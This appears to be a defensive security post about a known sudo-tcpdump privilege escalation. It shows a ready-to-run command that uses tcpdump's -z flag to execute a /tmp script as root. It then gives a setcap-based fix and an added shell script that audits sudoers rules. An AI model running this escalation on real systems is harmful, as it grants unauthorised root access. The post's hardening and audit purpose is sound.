Do you have Linux hosts where non-privileged users are allowed to run tcpdump because tcpdump has been placed in the sudoers file? tcpdump has a -z flag that lets you specify a post-rotate command to run. That command runs with tcpdump's own privileges, so a user who may sudo tcpdump can create a text file in /tmp with commands that will be executed as root.
Although this isn't a newly discovered hack, it bears repeating because it is still seen in production environments.
$ sudo -l
[sudo] password for john:
User john may run the following commands on this host:
    (root) /usr/sbin/tcpdump
The tcpdump man page describes -z as follows: "Used in conjunction with the -C or -G options, this will make tcpdump run "postrotate-command file" where file is the savefile being closed after each rotation. For example, specifying -z gzip or -z bzip2 will compress each savefile using gzip or bzip2."
A way to test this is to create a file, /tmp/.test, containing the "id" command, and then run: "sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root"
It will output:
uid=0(root) gid=0(root) groups=0(root)
The way to fix this:
With the following command, tcpdump gets the file capabilities it needs to capture packets, so it can be run as a normal user instead of as root. Remove the sudoers entry as well; capabilities on the binary do not by themselves revoke an existing sudo rule.
setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
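As an added example (not part of the original post), here is a small audit helper that scans sudoers-format text for the rule pattern above: any user rule that lets someone run tcpdump, directly or through a Cmnd_Alias, as root or as ALL. The sample sudoers content, the alias name CAPTURE and the user names are constructed for the demo, and the script assumes aliases are defined before they are used.

```sh
#!/bin/sh
# Added audit helper, not part of the original post. Reads sudoers-format text on
# stdin and prints each user rule that lets someone run tcpdump as root, directly
# or via a Cmnd_Alias: exactly the setup that -z turns into root command execution.
# Assumptions: aliases are defined before use; rules granting ALL commands are not
# reported (those users can already do anything).
audit_tcpdump_sudo() {
    sed -e 's/#.*$//' -e '/^[[:space:]]*$/d' |
    awk '
        /^Cmnd_Alias/ {                 # remember alias names that wrap tcpdump
            if ($0 ~ /tcpdump/) { split($2, a, "="); bad_alias[a[1]] = 1 }
            next
        }
        /^(Defaults|User_Alias|Host_Alias|Runas_Alias)/ { next }
        {
            user = $1
            rest = $0
            sub(/^[^=]*=[ \t]*/, "", rest)   # drop "user host=" -> "(runas) tag: cmd"
            runas = "root"                   # sudoers runas_default when omitted
            if (rest ~ /^\(/) {
                p = index(rest, ")")
                runas = substr(rest, 2, p - 2)
                rest = substr(rest, p + 1)
                sub(/^[ \t]+/, "", rest)
            }
            split(runas, r, ":")             # "(user:group)" -> keep the user part
            if (r[1] != "root" && r[1] != "ALL") next
            hit = (rest ~ /tcpdump/)
            n = split(rest, tok, /[ ,\t]+/)
            for (i = 1; i <= n; i++) if (tok[i] in bad_alias) hit = 1
            if (hit) printf "%s\t(%s)\t%s\n", user, r[1], rest
        }'
}

# Constructed sample sudoers content for the demo; alias CAPTURE and all users are made up.
SAMPLE_SUDOERS='Defaults env_reset
Cmnd_Alias CAPTURE = /usr/sbin/tcpdump
john  ALL=(root) /usr/sbin/tcpdump
alice ALL=(root) NOPASSWD: /usr/sbin/tcpdump -i eth0
carol ALL=(capture) /usr/sbin/tcpdump
eve   ALL=(ALL:ALL) CAPTURE
dave  ALL=/usr/sbin/tcpdump'

# Number of offending rules; anything non-zero means the sudo rule should be
# replaced by file capabilities on the tcpdump binary (setcap, as shown above).
count_tcpdump_sudo() {
    printf '%s\n' "$SAMPLE_SUDOERS" | audit_tcpdump_sudo | wc -l | tr -d ' '
}
printf '%s\n' "$SAMPLE_SUDOERS" | audit_tcpdump_sudo
```

On a real host, feed it the actual files instead of the sample, e.g. `cat /etc/sudoers /etc/sudoers.d/* | audit_tcpdump_sudo` (reading those files requires root).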